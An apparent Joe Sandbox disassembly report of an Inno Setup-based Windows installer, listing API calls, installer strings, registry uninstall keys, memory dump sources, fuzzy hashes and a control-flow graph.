                                                              • Installing the file., xrefs: 00470F09
                                                              • Time stamp of our file: %s, xrefs: 0047099B
                                                              • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                              • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                              • API String ID: 0-4021121268
                                                              • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                              • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                              • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                              • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                              • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                              • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                              • API String ID: 2252812187-1888249752
                                                              • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                              • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                              • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                              • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                              APIs
                                                              • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                              • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                              • GetProcAddress.KERNEL32(6E130000,RmStartSession), ref: 00450309
                                                              • GetProcAddress.KERNEL32(6E130000,RmRegisterResources), ref: 0045031E
                                                              • GetProcAddress.KERNEL32(6E130000,RmGetList), ref: 00450333
                                                              • GetProcAddress.KERNEL32(6E130000,RmShutdown), ref: 00450348
                                                              • GetProcAddress.KERNEL32(6E130000,RmRestart), ref: 0045035D
                                                              • GetProcAddress.KERNEL32(6E130000,RmEndSession), ref: 00450372
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoadVersion
                                                              • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                              • API String ID: 1968650500-3419246398
                                                              • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                              • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                              • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                              • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                              • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                              • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                              • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                              APIs
                                                                • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                              • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                              • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021FF3EC,022010F4,?,?,02201124,?,?,02201174,?), ref: 004683FD
                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                              • String ID: $(Default)$STOPIMAGE$%H
                                                              • API String ID: 3231140908-2624782221
                                                              • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                              • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                              • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                              • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                              • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID: unins$unins???.*
                                                              • API String ID: 3541575487-1009660736
                                                              • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                              • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                              • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                              • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                              • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileFindFirstLast
                                                              • String ID:
                                                              • API String ID: 873889042-0
                                                              • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                              • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                              • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                              • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                              APIs
                                                              • GetVersion.KERNEL32(00000364,0046E17A), ref: 0046E0EE
                                                              • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,00000364,0046E17A), ref: 0046E10A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateInstanceVersion
                                                              • String ID:
                                                              • API String ID: 1462612201-0
                                                              • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                              • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                              • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                              • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                              • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                              • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                              • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                              APIs
                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                              • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                              • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                              • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                              • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                              • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                              • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                              APIs
                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                              • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                              • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                              • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 844 46f058-46f08a 845 46f0a7 844->845 846 46f08c-46f093 844->846 849 46f0ae-46f0e6 call 403634 call 403738 call 42dec0 845->849 847 46f095-46f09c 846->847 848 46f09e-46f0a5 846->848 847->845 847->848 848->849 856 46f101-46f12a call 403738 call 42dde4 849->856 857 46f0e8-46f0fc call 403738 call 42dec0 849->857 865 46f12c-46f135 call 46ed28 856->865 866 46f13a-46f163 call 46ee44 856->866 857->856 865->866 870 46f175-46f178 call 403400 866->870 871 46f165-46f173 call 403494 866->871 875 46f17d-46f1c8 call 46ee44 call 42c3fc call 46ee8c call 46ee44 870->875 871->875 884 46f1de-46f1ff call 45559c call 46ee44 875->884 885 46f1ca-46f1dd call 46eeb4 875->885 892 46f255-46f25c 884->892 893 46f201-46f254 call 46ee44 call 431404 call 46ee44 call 431404 call 46ee44 884->893 885->884 894 46f25e-46f29b call 431404 call 46ee44 call 431404 call 46ee44 892->894 895 46f29c-46f2a3 892->895 893->892 894->895 897 46f2e4-46f309 call 40b24c call 46ee44 895->897 898 46f2a5-46f2e3 call 46ee44 * 3 895->898 919 46f30b-46f316 call 47c26c 897->919 920 46f318-46f321 call 403494 897->920 898->897 927 46f326-46f331 call 478e04 919->927 920->927 934 46f333-46f338 927->934 935 46f33a 927->935 936 46f33f-46f509 call 403778 call 46ee44 call 47c26c call 46ee8c call 403494 call 40357c * 2 call 46ee44 call 403494 call 40357c * 2 call 46ee44 call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c 934->936 935->936 999 46f51f-46f52d call 46eeb4 936->999 1000 46f50b-46f51d call 46ee44 936->1000 1004 46f532 999->1004 1005 46f533-46f57c call 46eeb4 call 46eee8 call 46ee44 call 47c26c call 46ef4c 1000->1005 1004->1005 1016 46f5a2-46f5af 1005->1016 1017 46f57e-46f5a1 call 46eeb4 * 2 1005->1017 1019 46f5b5-46f5bc 1016->1019 1020 46f67e-46f685 1016->1020 1017->1016 1024 46f5be-46f5c5 1019->1024 1025 46f629-46f638 1019->1025 1021 46f687-46f6bd call 494cec 1020->1021 1022 46f6df-46f6f5 RegCloseKey 1020->1022 1021->1022 1024->1025 1029 46f5c7-46f5eb call 430bcc 1024->1029 1028 46f63b-46f648 1025->1028 1032 46f65f-46f678 call 430c08 call 46eeb4 1028->1032 1033 46f64a-46f657 1028->1033 1029->1028 1039 46f5ed-46f5ee 1029->1039 1042 46f67d 1032->1042 1033->1032 1037 46f659-46f65d 1033->1037 1037->1020 1037->1032 1041 46f5f0-46f616 call 40b24c call 479630 1039->1041 1047 46f623-46f625 1041->1047 1048 46f618-46f61e call 430bcc 1041->1048 1042->1020 1047->1041 1050 46f627 1047->1050 1048->1047 1050->1028
                                                              APIs
                                                                • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                              • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Value$Close
                                                              • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                              • API String ID: 3391052094-3342197833
                                                              • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                              • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                              • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                              • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
